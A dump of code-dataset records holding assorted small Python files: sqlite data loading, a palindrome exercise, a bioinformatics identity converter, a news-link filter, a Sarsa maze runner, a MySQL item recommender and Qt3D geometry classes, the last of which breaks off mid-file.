[(i['id'], i['identifier'], i['generation_id'],i['is_main_series'])\n\tfor i in readdata]\ncurs.executemany(\"INSERT INTO ABILITIES (id,identifier,generation_id,is_main_series) VALUES(?,?,?,?);\" ,abilities)\n\nwith open('pokemon_abilities.csv','rt') as pokabi:\n\treaddata = csv.DictReader(pokabi)\n\tpokeabil = [(i['pokemon_id'], i['ability_id'], i['is_hidden'], i['slot']) for i in readdata]\ncurs.executemany(\"INSERT INTO POKEMON_ABILITIES (pokemon_id,ability_id,is_hidden,slot) VALUES(?,?,?,?);\" ,pokeabil)\nmydb.commit()\nmydb.close()\n","repo_name":"rishyanthkondra/CS251-IITB-Software-and-Systems-Lab","sub_path":"inlab7- sqlite3/insert.py","file_name":"insert.py","file_ext":"py","file_size_in_byte":1066,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"9940881034","text":"class Solution:\r\n def isPalindrome(self, s: str) -> bool:\r\n s = s.lower()\r\n print(s)\r\n b = \"\"\r\n for i in s:\r\n if i.isalpha():\r\n b+= i \r\n print(b)\r\n\r\n\r\n if b == b[::-1]:\r\n return \"true\"\r\n else:\r\n return \"false\"\r\n \r\nsol = Solution()\r\nprint(sol.isPalindrome(\"race a car\"))","repo_name":"sohaildua/Datastructuresrepo","sub_path":"strinh/palindrome.py","file_name":"palindrome.py","file_ext":"py","file_size_in_byte":376,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"36070147535","text":"#!/usr/bin/env python\n\nfrom Bio.Seq import Seq\nfrom Bio.Alphabet import generic_dna\nfrom Bio import SeqIO\nfrom Bio import SearchIO\nfrom Bio.SeqRecord import SeqRecord\n\nimport os\nfrom os import listdir\nfrom os.path import join, isfile\nimport sys\nimport argparse\n\nimport edlib\nimport re\n\ndef edist(lst):\n if len(str(lst[0])) == 0:\n return -1, \"\"\n if len(str(lst[1])) == 0:\n return -1, \"\"\n result = edlib.align(str(lst[0]), str(lst[1]), mode=\"NW\", task=\"path\")\n return result[\"editDistance\"], result[\"cigar\"]\n\ndef aai(ar):\n p1, p2 = str(ar[0]), str(ar[1])\n if p1.endswith(\"*\"):\n p1 = p1[:-1]\n if p2.endswith(\"*\"):\n p2 = p2[:-1]\n ed, cigar = edist([str(p1), str(p2)])\n if ed == -1:\n return 0\n matches = re.findall(r'\\d+=', cigar)\n aai = 0.0\n for m in 
matches:\n aai += int(m[:-1])\n aai /= max(len(p1), len(p2))\n return aai*100\n\ndef load_fasta(filename, tp = \"list\"):\n if tp == \"map\":\n records = SeqIO.to_dict(SeqIO.parse(filename, \"fasta\"))\n for r in records:\n records[r] = records[r].upper() \n else:\n records = list(SeqIO.parse(filename, \"fasta\"))\n for i in range(len(records)):\n records[i] = records[i].upper()\n return records\n\ndef make_record(seq, name, sid, d=\"\"):\n return SeqRecord(seq, id=sid, name=name, description = d)\n\ndef add_rc_monomers(monomers):\n res = []\n for m in monomers:\n res.append(m)\n res.append(make_record(m.seq.reverse_complement(), m.name + \"'\", m.id + \"'\"))\n return res\n\ndef convert_read(decomposition, read, monomers):\n res = []\n for d in decomposition:\n monomer, start, end = d[\"m\"], d[\"start\"], d[\"end\"]\n scores = {}\n for m in monomers:\n score = aai([read.seq[start:end + 1], m.seq])\n scores[m.name] = score\n \n if monomer == None:\n for s in scores:\n if monomer == None or scores[s] > scores[monomer]:\n monomer = s\n secondbest, secondbest_score = None, -1 \n for m in scores:\n if m != monomer:\n if not secondbest or secondbest_score < scores[m]:\n secondbest, secondbest_score = m, scores[m]\n res.append({\"m\": monomer, \"start\": str(d[\"start\"]), \"end\": str(d[\"end\"]), \"score\": scores[monomer], \\\n \"second_best\": str(secondbest), \"second_best_score\": secondbest_score, \"alt\": scores, \"q\": \"+\"})\n\n window = 2\n for i in range(len(res)):\n sm, cnt = 0, 0\n for j in range(i - window, i + window + 1):\n if j >= 0 and j < len(res):\n sm += res[j][\"score\"]\n cnt += 1\n if sm/cnt < 80:\n res[i][\"q\"] = \"?\"\n\n return res\n\ndef print_read(fout, fout_alt, dec, read, monomers, identity_th):\n dec = convert_read(dec, read, monomers)\n for d in dec:\n if d[\"score\"] >= identity_th:\n fout.write(\"\\t\".join([read.name, d[\"m\"], d[\"start\"], d[\"end\"], \"{:.2f}\".format(d[\"score\"]), \\\n d[\"second_best\"], \"{:.2f}\".format(d[\"second_best_score\"]), d[\"q\"]]) + \"\\n\")\n for a in d[\"alt\"]:\n star = \"-\"\n if a == d[\"m\"]:\n star = \"*\"\n fout_alt.write(\"\\t\".join([read.name, a, d[\"start\"], d[\"end\"], \"{:.2f}\".format(d[\"alt\"][a]), star]) + \"\\n\")\n\ndef convert_tsv(filename, reads, monomers, outfile, identity_th):\n with open(outfile[:-len(\".tsv\")] + \"_alt.tsv\", \"w\") as fout_alt:\n with open(outfile, \"w\") as fout:\n with open(filename, \"r\") as fin:\n cur_dec = []\n prev_read = None\n for ln in fin.readlines():\n read, monomer, start, end = ln.split(\"\\t\")[:4]\n if read != prev_read and prev_read != None:\n print_read(fout, fout_alt, cur_dec, reads[prev_read], monomers, identity_th)\n cur_dec = []\n prev_read = read\n start, end = int(start), int(end)\n cur_dec.append({\"m\": monomer, \"start\": start, \"end\": end})\n if len(cur_dec) > 0:\n print_read(fout, fout_alt, cur_dec, reads[prev_read], monomers, identity_th)\n \ndef convert_fasta(filename, reads, monomers, outfile, identity_th):\n with open(outfile[:-len(\".tsv\")] + \"_alt.tsv\", \"w\") as fout_alt:\n with open(outfile, \"w\") as fout:\n with open(filename, \"r\") as fin:\n cur_dec = []\n prev_read = None\n for ln in fin.readlines():\n if ln.startswith(\">\"):\n read = ln.split(\"/\")[0][1:]\n if read != prev_read and prev_read != None:\n print_read(fout, fout_alt, cur_dec, reads[prev_read], monomers, identity_th)\n cur_dec = []\n prev_read = read\n start, end = [int(x) for x in ln.split(\"/\")[1].split(\"_\")]\n cur_dec.append({\"m\": None, \"start\": start, 
\"end\": end})\n if len(cur_dec) > 0:\n print_read(fout, fout_alt, cur_dec, reads[prev_read], monomers, identity_th)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='Convert decomposition scores into identities')\n parser.add_argument('-s', '--sequences', help='fasta-file with long reads sequences', required=True)\n parser.add_argument('-m', '--monomers', help='fasta-file with monomers', required=True)\n parser.add_argument('-d', '--decomposition', help='tsv-file (for DP) or fasta-file (for AC) with decomposition', required=True)\n parser.add_argument('-i', '--min-identity', help='only monomer alignments with percent identity >= MIN_IDENTITY are printed (by default MIN_IDENTITY=0)', type=int, default=0, required=False)\n parser.add_argument('-o', '--out', help='output tsv-file, by default will be saved into decomposition.tsv', required=False)\n\n args = parser.parse_args()\n outfile = args.out\n if outfile == None:\n outfile = \"./decomposition.tsv\"\n\n reads = load_fasta(args.sequences, \"map\")\n monomers = load_fasta(args.monomers)\n monomers = add_rc_monomers(monomers)\n if args.decomposition.endswith(\"tsv\"):\n convert_tsv(args.decomposition, reads, monomers, outfile, args.min_identity)\n else:\n convert_fasta(args.decomposition, reads, monomers, outfile, args.min_identity)\n\n \n \n\n","repo_name":"TanyaDvorkina/sdpaper","sub_path":"scripts/convert_identities.py","file_name":"convert_identities.py","file_ext":"py","file_size_in_byte":6587,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"81"} +{"seq_id":"25968826316","text":"my_string = input(\"Введите числа через пробел: \")\nlist_num = my_string.split()\nnumbers = []\nfor i in range(len(list_num)):\n numbers.append(int(list_num[i]))\n\n\ndef get_sum(my_list):\n my_sum = 0\n for j in range(1, len(my_list), 2):\n my_sum += my_list[j]\n return my_sum\n\n\nprint(f'Сумма элементов, стоящих на нечётной позиции: {get_sum(numbers)}')\n","repo_name":"nararock/homework_python3","sub_path":"task7.py","file_name":"task7.py","file_ext":"py","file_size_in_byte":424,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"15248896550","text":"import recom as WebCrawl\n\n\ndef is_title(title1):\n # 字符串是否为新闻标题(初判断:不含一个汉字)\n\n def is_chinese(char0):\n # 判断单个字符是否为汉字\n if '\\u4e00' <= char0 <= '\\u9fff':\n return True\n else:\n return False\n\n n = len(title1)\n count = 0\n for char in title1:\n if not is_chinese(char):\n count = count + 1\n if count == n:\n return False\n else:\n return True\n\n\ndef link_judge(url, link):\n # 链接是否为视频或图片链接等\n\n if url == WebCrawl.urls[0]:\n if link.startswith('http://www.xinhuanet.com/video/')\\\n or link.startswith('http://news.xinhuanet.com/video/')\\\n or link == 'http://fms.news.cn/swf/2017qmtt/7_3_2017_jj/index.html':\n return False\n\n if url == WebCrawl.urls[1]:\n if link.startswith('http://www.chinanews.com/gj/shipin/') \\\n or link.startswith('http://www.chinanews.com/tp/')\\\n or link.startswith('http://www.chinanews.com/shipin/'):\n return False\n\n '''if url == WebCrawl.urls[2]:\n if link.startswith('http://slide.blog.sina.com.cn/') \\\n or link.startswith('http://blog.sina.com.cn/')\\\n or link.startswith('http://vip.book.sina.com.cn/'):\n return False\n\n if url == WebCrawl.urls[3]:\n if link.startswith('http://slide.blog.sina.com.cn/') \\\n or link.startswith('http://blog.sina.com.cn/')\\\n or link.startswith('http://vip.book.sina.com.cn/')\\\n or 
link.startswith('http://zx.jiaju.sina.com.cn/')\\\n or link.startswith('http://video.sina.com.cn/'):\n return False\n\n if url == WebCrawl.urls[3]:\n if link.startswith('http://huanqiu.com/a1/')\\\n or link.startswith('http://bbs.huanqiu.com/'):\n return False\n\n if url == WebCrawl.urls[4]:\n if link.startswith('http://view.inews.qq.com/'):\n return False'''\n\n return True\n\n\ndef analyze(url, soup1):\n # 提取链接中的正文内容\n\n init = 1 # 初始标题长度下限\n if url == WebCrawl.urls[0]: # 新华网\n news0 = soup1.select(\"div.chaCom_con a\")\n news1 = soup1.select(\"ul.dataList01 a\")\n news2 = soup1.select(\"h3.focusWordBlue a\")\n news = news0 + news1 + news2\n\n elif url == WebCrawl.urls[1]: # 中国新闻网\n news0 = soup1.select('div.xwzxdd-xbt a')\n news1 = soup1.select('div.new_right_content a')\n news2 = soup1.select(\"div.new_con_yw a\")\n news3 = soup1.select(\"div.rank_right_ul a\")\n news4 = soup1.select(\"div.mt15 a\")\n news = news0 + news1 + news2 + news3 + news4\n init = 4\n\n '''elif url == WebCrawl.urls[2]: # 新浪新闻\n news0 = soup1.select(\"div.blk_04 a\" and \"div#blk_yw_01 a\")\n news1 = soup1.select(\"div.p_left_2 a\")\n news2 = soup1.select(\"div.p_middle a\")\n news = news0 + news1 + news2\n init = 2\n\n elif url == WebCrawl.urls[3]: # 环球网\n news0 = soup1.select(\"div.look a\")\n news1 = soup1.select(\"div.lookOverseas a\")\n news2 = soup1.select(\"div.midFir a\")\n news3 = soup1.select(\"div.txtArea a\")\n news4 = soup1.select(\"ul.iconBoxT14 a\")\n news = news0 + news1 + news2 + news3 + news4\n init = 4\n\n elif url == WebCrawl.urls[4]: # 腾讯新闻\n news0 = soup1.select(\"div.society a\")\n news1 = soup1.select(\"div.military a\")\n news2 = soup1.select(\"div.history a\")\n news3 = soup1.select(\"div.media a\")\n news4 = soup1.select(\"div.gongyi a\")\n news5 = soup1.select(\"div.city a\")\n news6 = soup1.select(\"div#subHot a\")\n news7 = soup1.select(\"em.f14 > a\")\n news8 = soup1.select(\"div.text > ul > li > a\")\n news = news0 + news1 + news2 + news3 + news4 + news5 + news6 + news7 + news8\n init = 2'''\n\n print('根据网页排布初次筛选后的链接数:', len(news))\n\n newslist = []\n linklist = []\n\n for n in news:\n\n link = n.get(\"href\")\n if url == WebCrawl.urls[1]:\n # 中国新闻网标签中给出的是站内地址\n if link.startswith('//'):\n link = link.replace('//', 'http://')\n else:\n if link.startswith('/'):\n link = 'http://www.chinanews.com/' + link\n\n if link not in linklist and len(link) > 30: # 链接判重,长度过滤\n title = n.get_text()\n if not link_judge(url, link): # 自定义函数舍弃无效链接\n title = ''\n if len(title) > init and is_title(title): # 标题长度、内容过滤\n linklist.append(link)\n alist = [title, link]\n newslist.append(alist)\n\n print('链接判重及过滤后根据标题再次筛选所得的链接数:', len(newslist))\n print(newslist)\n\n return newslist\n","repo_name":"LinkleYping/news-recommend","sub_path":"recom/recom/website.py","file_name":"website.py","file_ext":"py","file_size_in_byte":4998,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"81"} +{"seq_id":"74806984264","text":"#! 
python \n# @Time : 17-12-19\n# @Author : kay\n# @File : run.py\n# @E-mail : 861186267@qq.com\n# @Function:\n\nfrom environment import MAZE\nfrom SarsaAndQ_Learning import *\n\n\ndef update():\n for epoch in range(200):\n observation = env.reset()\n action = RL.choose_action(str(observation))\n\n while True:\n # refresh env\n env.render()\n\n # take action and get next observation and reward\n observation_, reward, done = env.step(action)\n\n action_ = RL.choose_action(str(observation_))\n RL.learn(str(observation), action, reward, str(observation_), action_)\n\n action = action_\n observation = observation_\n\n if done:\n break\n\n\nif __name__ == '__main__':\n env = MAZE()\n RL = Sarsa(actions=list(range(env.n_actions)))\n env.after(100, update)\n env.mainloop()\n","repo_name":"kayzss/ReinforceLearning","sub_path":"Maze/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":898,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"7539829990","text":"import numpy as np\nimport mysql.connector\nimport logging\n\n#它娘的。\n#bookid到底是以str还是int来保存的?从数据库取出来之后,都是str,但是在放入row。\n#配置文件的保存\n#np.zeros是否能用空间更小的方式保存。\n#将row、line转化为np文件\n#下面还没用上\ndatabase = ''\nintable = 'booklist_yousuu'\nouttable = 'toprelate_yousuu'\nminrefered= 9\ndb_user = 'root'\ndb_password = 'password'\ndb_database = 'Recommend'\n\nclass Recommend():\n def __init__(self,mini_refered,topN=5):\n self.users = []\n self.items = []\n self.mini_refered = mini_refered\n self.topN = topN\n\n def mysql_connector(self, sql):\n # 'select * from %s' %table\n cursor = conn.cursor()\n cursor.execute(sql)\n result = cursor.fetchall()\n logger.info('execute sql: %s' % sql)\n cursor.close()\n return result\n\n def load_from_db(self):\n #数据库\n self.data = self.mysql_connector('select * from %s' %intable)\n #计算user\\items,计算次数\n items_with_count = {}\n for x in self.data:\n user = x[0]\n item = x[1]\n if user not in self.users:\n self.users.append(user)\n if item not in self.items:\n self.items.append(item)\n items_with_count[item] = 0\n else:\n items_with_count[item] += 1\n #去掉item中那些未达标的\n for i in items_with_count:\n if items_with_count[i] < self.mini_refered:\n self.items.remove(i)\n\n\n def item_user_matrix(self):\n self.iumatrix = np.zeros((len(self.items), len(self.users)))\n for x in self.data:\n user = x[0]\n item = x[1]\n if item in self.items:\n r = self.items.index(item) # 定位行,book,要变成数字\n l = self.users.index(user) # !!!如果有的话 定位列,书单\n self.iumatrix[r][l] = x[2]\n logger.info('iumatrix finish。')\n\n def cos(self,vector1, vector2):\n #这里打分未经过修正\n dot_product = 0.0\n normA = 0.0\n normB = 0.0\n for a, b in zip(vector1, vector2):\n dot_product += a * b\n normA += a ** 2\n normB += b ** 2\n if normA == 0.0 or normB == 0.0 or dot_product == 0.0:\n return 0\n else:\n return round(dot_product / ((normA ** 0.5) * (normB ** 0.5)) * 100, 2) # round()返回浮点数x的四舍五入值\n\n def item_item_matrix(self):\n item_num= len(self.items)\n self.iimatrix =np.zeros((item_num,item_num))\n logger.info('iimatrix start:')\n #self.bbmatrix = self.bpmatrix + self.load_temp()\n for i in range(item_num - 1):\n for j in range(i+1,item_num):\n self.iimatrix[i][j] = self.iimatrix[j][i] = self.cos(self.iumatrix[i], self.iumatrix[j]) # 行相乘\n logger.info('line Done : %s' %i)\n print ('line Done : %s' %i)\n logger.info('iimatrix赋值完。')\n\n def find_top_related_item(self):\n #每本书,比较,获得其中最大的item。\n all_topitems = []\n for i in range(len(self.items)): #对每一个item进行循环\n topitems = [self.items[i]] 
#数据库里第一行是自己,然后是top1,2,3,4,5\n items_with_score = zip(self.iimatrix[i], self.items)\n top_item_with_socre = sorted(items_with_score, reverse=True)[:self.topN] # [(99,11),(90,2),...]\n for topitem in top_item_with_socre:\n topitems.append(topitem[1])\n all_topitems.append(topitems)\n logger.info(topitems)\n self.save(all_topitems)\n logger.info('top赋值完。')\n #进一步保存\n\n def save(self,items):\n #t0,[t1, t2, t3, t4, t5] = items\n #这里不知道怎么输入这个table名\n #cursor.execute('insert into toprelate_saowen(bookid,top1,top2,top3,top4,top5) values(%s,%s,%s,%s,%s,%s)',\n # [t0, t1, t2, t3, t4, t5])\n sql = 'INSERT INTO '+ outtable + ' VALUES(%s,%s,%s,%s,%s,%s)'\n cursor = conn.cursor()\n cursor.executemany(sql,items)\n conn.commit()\n cursor.close()\n print ('全部保存')\n\n def main(self):\n self.load_from_db()\n self.item_user_matrix()\n self.item_item_matrix()\n self.find_top_related_item()\n\n\n\nlogging.basicConfig(filename='producer.log', level=logging.INFO, filemode='a', format='%(asctime)s %(filename)s[line:%(lineno)d] %(levelname)s %(message)s', datefmt='%Y/%m/%d %H:%M:%S')\nlogger = logging.getLogger(__name__)\nconn = mysql.connector.connect(user=db_user, password=db_password, database=db_database)\n\n\nr = Recommend(mini_refered=minrefered)\nr.main()\n\nconn.close()\n\n\n","repo_name":"MinionBug/recommend","sub_path":"producer/main_v2.py","file_name":"main_v2.py","file_ext":"py","file_size_in_byte":4842,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"23755392182","text":"#!/usr/bin/env python3\n\nimport sys\n\nimport numpy as np\n\n# from spwc import sscweb\n\nfrom PySide2.Qt3DExtras import Qt3DExtras\nfrom PySide2.Qt3DCore import Qt3DCore\nfrom PySide2.Qt3DRender import Qt3DRender\n\nfrom PySide2.QtWidgets import (\n QApplication,\n)\n\nfrom PySide2.QtGui import (\n QVector3D,\n QQuaternion,\n QMatrix4x4,\n QColor,\n)\n\nfrom PySide2.QtCore import (\n QObject,\n Property,\n Signal,\n\n QPropertyAnimation,\n QByteArray,\n\n qFuzzyCompare,\n QSize\n)\n\nclass PointGeometry(Qt3DRender.QGeometry):\n def __init__(self, position: QVector3D, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n self.vertexBuffer = Qt3DRender.QBuffer()\n self.indexBuffer = Qt3DRender.QBuffer()\n self.positionAttribute = Qt3DRender.QAttribute()\n self.indexAttribute = Qt3DRender.QAttribute()\n\n self.positionAttribute.setName(Qt3DRender.QAttribute.defaultPositionAttributeName())\n self.positionAttribute.setVertexBaseType(Qt3DRender.QAttribute.Float)\n self.positionAttribute.setVertexSize(3)\n self.positionAttribute.setAttributeType(Qt3DRender.QAttribute.VertexAttribute)\n self.positionAttribute.setBuffer(self.vertexBuffer)\n self.positionAttribute.setByteStride(0)\n self.positionAttribute.setCount(3)\n\n self.indexAttribute.setAttributeType(Qt3DRender.QAttribute.IndexAttribute)\n self.indexAttribute.setVertexBaseType(Qt3DRender.QAttribute.UnsignedShort)\n self.indexAttribute.setBuffer(self.indexBuffer)\n self.indexAttribute.setCount(1)\n\n self.data = PointGeometry.createPointVertexData(position)\n self.vertexBuffer.setData(self.data)\n\n self.index = PointGeometry.createPointIndexData()\n self.vertexBuffer.setData(self.index)\n\n self.addAttribute(self.positionAttribute)\n self.addAttribute(self.indexAttribute)\n\n def createPointVertexData(position: QVector3D):\n data = np.array((position.x(), position.y(), position.z()), dtype=np.single)\n assert len(data.tobytes()) == 12\n print([hex(c) for c in data.tobytes()])\n return data.tobytes()\n\n def 
createPointIndexData():\n data = np.array([0], dtype=np.uint16)\n assert len(data.tobytes()) == 2\n print(data)\n return data.tobytes()\n\n\nclass Point(Qt3DRender.QGeometryRenderer):\n def __init__(self, position: QVector3D, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n self._geometry = PointGeometry(position)\n self.setPrimitiveType(Qt3DRender.QGeometryRenderer.Points)\n\n self.setGeometry(self._geometry)\n\n\nclass Plane(Qt3DCore.QEntity):\n\n\n\n def __init__(self, w: float, h: float, resolution: QSize, color: QColor, mirrored: bool = False,\n *args, **kwargs):\n\n super().__init__(*args, **kwargs)\n\n self._geo = Qt3DRender.QGeometry(self)\n\n self.positionAttribute = Qt3DRender.QAttribute(self._geo)\n self.normalAttribute = Qt3DRender.QAttribute(self._geo)\n self.texCoordAttribute = Qt3DRender.QAttribute(self._geo)\n self.tangentAttribute = Qt3DRender.QAttribute(self._geo)\n self.indexAttribute = Qt3DRender.QAttribute(self._geo)\n self.vertexBuffer = Qt3DRender.QBuffer(self._geo)\n self.indexBuffer = Qt3DRender.QBuffer(self._geo)\n\n nVerts = resolution.width() * resolution.height()\n stride = (3 + 2 + 3 + 4) * 4 # sizeof(float);\n faces = 2 * (resolution.width() - 1) * (resolution.height() - 1)\n\n self.positionAttribute.setName(Qt3DRender.QAttribute.defaultPositionAttributeName())\n self.positionAttribute.setVertexBaseType(Qt3DRender.QAttribute.Float)\n self.positionAttribute.setVertexSize(3)\n self.positionAttribute.setAttributeType(Qt3DRender.QAttribute.VertexAttribute)\n self.positionAttribute.setBuffer(self.vertexBuffer)\n self.positionAttribute.setByteStride(stride)\n self.positionAttribute.setCount(nVerts)\n\n self.texCoordAttribute.setName(Qt3DRender.QAttribute.defaultTextureCoordinateAttributeName())\n self.positionAttribute.setVertexBaseType(Qt3DRender.QAttribute.Float)\n self.texCoordAttribute.setVertexSize(2)\n self.texCoordAttribute.setAttributeType(Qt3DRender.QAttribute.VertexAttribute)\n self.texCoordAttribute.setBuffer(self.vertexBuffer)\n self.texCoordAttribute.setByteStride(stride)\n self.texCoordAttribute.setByteOffset(3 * 4)\n self.texCoordAttribute.setCount(nVerts)\n\n self.normalAttribute.setName(Qt3DRender.QAttribute.defaultNormalAttributeName())\n self.normalAttribute.setVertexBaseType(Qt3DRender.QAttribute.Float)\n self.normalAttribute.setVertexSize(3)\n self.normalAttribute.setAttributeType(Qt3DRender.QAttribute.VertexAttribute)\n self.normalAttribute.setBuffer(self.vertexBuffer)\n self.normalAttribute.setByteStride(stride)\n self.normalAttribute.setByteOffset(5 * 4)\n self.normalAttribute.setCount(nVerts)\n\n self.tangentAttribute.setName(Qt3DRender.QAttribute.defaultTangentAttributeName())\n self.tangentAttribute.setVertexBaseType(Qt3DRender.QAttribute.Float)\n self.tangentAttribute.setVertexSize(4)\n self.tangentAttribute.setAttributeType(Qt3DRender.QAttribute.VertexAttribute)\n self.tangentAttribute.setBuffer(self.vertexBuffer)\n self.tangentAttribute.setByteStride(stride)\n self.tangentAttribute.setByteOffset(8 * 4)\n self.tangentAttribute.setCount(nVerts)\n\n self.indexAttribute.setAttributeType(Qt3DRender.QAttribute.IndexAttribute)\n self.indexAttribute.setVertexBaseType(Qt3DRender.QAttribute.UnsignedShort)\n self.indexAttribute.setBuffer(self.indexBuffer)\n\n # Each primitive has 3 vertives\n self.indexAttribute.setCount(faces * 3)\n\n self.vertexBuffer.setData(Plane.createPlaneVertexData(w, h, resolution, mirrored))\n self.indexBuffer.setData(Plane.createPlaneIndexData(resolution))\n\n self._geo.addAttribute(self.positionAttribute)\n 
self._geo.addAttribute(self.texCoordAttribute)\n self._geo.addAttribute(self.normalAttribute)\n self._geo.addAttribute(self.tangentAttribute)\n self._geo.addAttribute(self.indexAttribute)\n\n # mesh\n self.mesh = Qt3DRender.QGeometryRenderer(self)\n self.mesh.setGeometry(self._geo)\n self.mesh.setPrimitiveType(Qt3DRender.QGeometryRenderer.TriangleFan)\n\n self.material = Qt3DExtras.QPhongMaterial(self)\n self.material.setAmbient(color)\n\n self.addComponent(self.mesh)\n self.addComponent(self.material)\n\n\nclass Line(Qt3DCore.QEntity):\n def __init__(self,\n points: np.array,\n color: QColor,\n *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n print(points, points.shape, points.dtype, len(points.tobytes()))\n\n self._geo = Qt3DRender.QGeometry(self)\n\n # position vertices (start and end)\n self.buffer = Qt3DRender.QBuffer(self._geo)\n self.buffer.setData(points.tobytes())\n\n print(self.buffer.data().size())\n\n self.positionAttribute = Qt3DRender.QAttribute(self._geo)\n self.positionAttribute.setName(Qt3DRender.QAttribute.defaultPositionAttributeName())\n self.positionAttribute.setVertexBaseType(Qt3DRender.QAttribute.Double)\n self.positionAttribute.setVertexSize(3)\n self.positionAttribute.setAttributeType(Qt3DRender.QAttribute.VertexAttribute)\n self.positionAttribute.setBuffer(self.buffer)\n self.positionAttribute.setByteStride(points.shape[1] * 8) # sizeof(float)\n self.positionAttribute.setCount(points.shape[0])\n self._geo.addAttribute(self.positionAttribute) # We add the vertices in the geometry\n\n # connectivity between vertices\n self.indices = np.arange(0, points.shape[0], dtype=np.uint32).tobytes()\n\n self.indexBuffer = Qt3DRender.QBuffer(self._geo)\n self.indexBuffer.setData(self.indices)\n\n self.indexAttribute = Qt3DRender.QAttribute(self._geo)\n self.indexAttribute.setVertexBaseType(Qt3DRender.QAttribute.UnsignedInt)\n self.indexAttribute.setAttributeType(Qt3DRender.QAttribute.IndexAttribute)\n self.indexAttribute.setBuffer(self.indexBuffer)\n self.indexAttribute.setCount(points.shape[0])\n self._geo.addAttribute(self.indexAttribute) # We add the indices linking the points in the geometry\n\n # mesh\n self.line = Qt3DRender.QGeometryRenderer(self)\n self.line.setGeometry(self._geo)\n self.line.setPrimitiveType(Qt3DRender.QGeometryRenderer.TriangleStrip)\n\n self.material = Qt3DExtras.QPhongMaterial(self)\n self.material.setAmbient(color)\n\n self.addComponent(self.line)\n self.addComponent(self.material)\n\n\nclass OrbitTransformController(QObject):\n def __init__(self, turn_vector: QVector3D, pos: QVector3D, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n self._radius = 1.0\n self._angle = 0\n self._target = None\n self._matrix = QMatrix4x4()\n self._turn = turn_vector\n self._pos = pos\n\n def setTarget(self, target: Qt3DCore.QTransform):\n if self._target != target:\n self._target = target\n self.targetChanged.emit()\n\n def target(self):\n return self._target\n\n def setRadius(self, radius: float):\n if not qFuzzyCompare(radius, self._radius):\n self._radius = radius\n self._updateMatrix()\n self.radiusChanged.emit()\n\n def radius(self):\n return self._radius\n\n def setAngle(self, angle: float):\n if not qFuzzyCompare(angle, self._angle):\n self._angle = angle\n self._updateMatrix()\n self.angleChanged.emit()\n\n def angle(self):\n return self._angle\n\n def _updateMatrix(self):\n self._matrix.setToIdentity()\n self._matrix.rotate(self._angle, self._turn)\n self._matrix.translate(self._radius + self._pos.x(), self._pos.y(), self._pos.z())\n 
self._target.setMatrix(self._matrix)\n\n target = Property(Qt3DCore.QTransform, target, setTarget)\n radius = Property(float, radius, setRadius)\n angle = Property(float, angle, setAngle)\n\n targetChanged = Signal()\n radiusChanged = Signal()\n angleChanged = Signal()\n\n\n\n\nclass Sphere(Qt3DCore.QEntity):\n def __init__(self, root, pos, rad, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n self.sphereEntity = Qt3DCore.QEntity(root)\n self.sphereMesh = Qt3DExtras.QSphereMesh()\n self.sphereMesh.setRadius(rad)\n self.sphereMesh.setGenerateTangents(True)\n\n self.sphereTransform = Qt3DCore.QTransform()\n self.sphereTransform.setTranslation(pos)\n\n self.sphereEntity.addComponent(self.sphereMesh)\n self.sphereEntity.addComponent(self.sphereTransform)\n\n self.material = Qt3DExtras.QPhongMaterial(root)\n self.sphereEntity.addComponent(self.material)\n\n\nclass Scene(Qt3DCore.QEntity):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n # self.material = Qt3DExtras.QPhongMaterial(self)\n\n # self.torusEntity = Qt3DCore.QEntity(self)\n # self.torusMesh = Qt3DExtras.QTorusMesh()\n # self.torusMesh.setRadius(5)\n # self.torusMesh.setMinorRadius(1)\n # self.torusMesh.setRings(100)\n # self.torusMesh.setSlices(20)\n\n # self.torusTransform = Qt3DCore.QTransform()\n # self.torusTransform.setScale3D(QVector3D(1.5, 1, 0.5))\n # self.torusTransform.setTranslation(QVector3D(0, 0, 0)) # position\n # self.torusTransform.setRotation(QQuaternion.fromAxisAndAngle(QVector3D(1, 0, 0), 45.0))\n\n # self.torusEntity.addComponent(self.torusMesh)\n # self.torusEntity.addComponent(self.torusTransform)\n # self.torusEntity.addComponent(self.material)\n\n # self.cuboid = Qt3DExtras.QCuboidMesh()\n # # CuboidMesh Transform\n # self.cuboidTransform = Qt3DCore.QTransform()\n # self.cuboidTransform.setScale(10.0)\n # self.cuboidTransform.setTranslation(QVector3D(5.0, -4.0, 0.0))\n\n # self.cuboidMaterial = Qt3DExtras.QPhongAlphaMaterial()\n # self.cuboidMaterial.setDiffuse(QColor.fromRgb(120, 20, 20))\n # self.cuboidMaterial.setAlpha(0.5)\n\n # self.cuboidEntity = Qt3DCore.QEntity(self)\n # self.cuboidEntity.addComponent(self.cuboid)\n # self.cuboidEntity.addComponent(self.cuboidMaterial)\n # self.cuboidEntity.addComponent(self.cuboidTransform)\n\n # self.sphere = []\n # count = 100\n # for i in range(count):\n # self.sphere.append(SphereEntity(self, QVector3D(i, i, i), QVector3D(0, 100 * i / count, 0)))\n\n points = np.array([[0, -10, 0],\n [0, 10, 0],\n [10, 10, 10],\n [10, 10, 20]\n ], dtype=np.float)\n\n # ssc = sscweb.SscWeb()\n # sv = ssc.get_orbit(product=\"mms1\",\n # start_time=\"2020-10-10\",\n # stop_time=\"2020-10-24\",\n # coordinate_system='gse')\n\n # points = sv.data[::50, 0:3] / 10000\n\n # self.line = Line(points, QColor.fromRgb(0, 255, 0), self)\n\n # self.spheres = []\n # for p in points:\n # print(p, p[0])\n # self.spheres.append(Sphere(self, QVector3D(p[0], p[1], p[2]), 0.1))\n\n # self.plane = Plane(10, 10, QSize(2, 3), False, 